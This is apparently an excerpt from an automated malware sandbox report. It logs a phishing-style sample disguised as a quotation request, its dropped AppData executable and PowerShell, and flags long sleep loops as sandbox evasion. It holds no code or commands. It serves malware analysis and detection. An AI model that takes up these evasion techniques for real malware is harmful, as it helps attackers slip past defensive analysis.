Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594593 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599558
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598575
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598451
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598316
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596030
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595774
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595504
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594936
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594281
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5592 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 800 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7075 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1061 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Window / User API: threadDelayed 2508 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Window / User API: threadDelayed 7333 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Window / User API: threadDelayed 2530
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Window / User API: threadDelayed 7328
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 4836 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4148 Thread sleep count: 5592 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 800 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1476 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6504 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 7060 Thread sleep count: 2508 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599873s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599763s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 7060 Thread sleep count: 7333 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597653s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -594922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -594812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -594593s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 6696 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1088 Thread sleep count: 2530 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1088 Thread sleep count: 7328 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599558s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598905s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598796s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598575s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598451s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598316s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598187s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598077s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597968s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597531s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597421s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597312s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597093s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596874s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596218s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596030s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595921s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595774s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595504s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595375s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595156s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595046s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594936s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594718s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594390s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594281s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599873 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599763 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599203 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599094 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598859 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598750 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598640 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598422 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598094 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597653 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597218 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596671 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596453 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596344 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595359 Jump to behavior
